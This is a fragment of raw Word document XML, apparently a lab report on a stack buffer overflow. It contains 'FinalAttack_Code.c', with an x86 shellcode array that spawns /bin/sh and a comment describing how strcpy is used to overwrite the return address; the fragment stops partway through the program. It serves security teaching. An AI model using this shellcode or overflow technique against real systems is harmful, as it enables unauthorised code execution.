        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char *name[2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7FEFB" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="522DAB0A" w14:textId="19C694A1" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name[0] = "/bin/sh";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D077FE4" w14:textId="358F645B" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name[1] = NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C21ED3" w14:textId="34DCEA16" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execve(name[0], name, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC1DA7D" w14:textId="5492CD61" w:rsidR="002162D2" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDE4D9" w14:textId="0B037534" w:rsidR="004305C0" w:rsidRDefault="004305C0" w:rsidP="007A03A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004305C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FinalAttack_Code.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB3F794" w14:textId="792D9844" w:rsidR="004305C0" w:rsidRDefault="004305C0" w:rsidP="007A03A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6A7B1B" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53018476" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4391E8" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474178D4" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C5271F" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>After the gdb debugging step, we obtained the final shellcode. Towards the end, we included the "/bin/sh" command, which will initiate the shell once executed. To overwrite the return address, we utilize the "strcpy" function to copy our large_string containing the shellcode into the buffer. As a test, we incorporated a printf statement with the message "Testing" to verify if the new shell starts functioning. If the attack is successful, the shell will commence immediately after the printf statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A9C63" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE70C8" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC99B4C" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char shellcode[] =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40578901" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792FAF65" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568B333" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        "\x80\xe8\xdc\xff\xff\xff/bin/sh";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF6899" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404C6A7B" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char large_string[128];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9DD3AA" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C80396D" w14:textId="77777777" w:rsidR="00373E4F" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>void main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CDF894" w14:textId="17769D60" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C5F4BF" w14:textId="7B708E7C" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char buffer[96];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4B18F4" w14:textId="1C6FE196" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809331E" w14:textId="7FC66DC8" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>long *long_ptr = (long *) large_string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FABDB9" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354D220C" w14:textId="7FA4CDAB" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
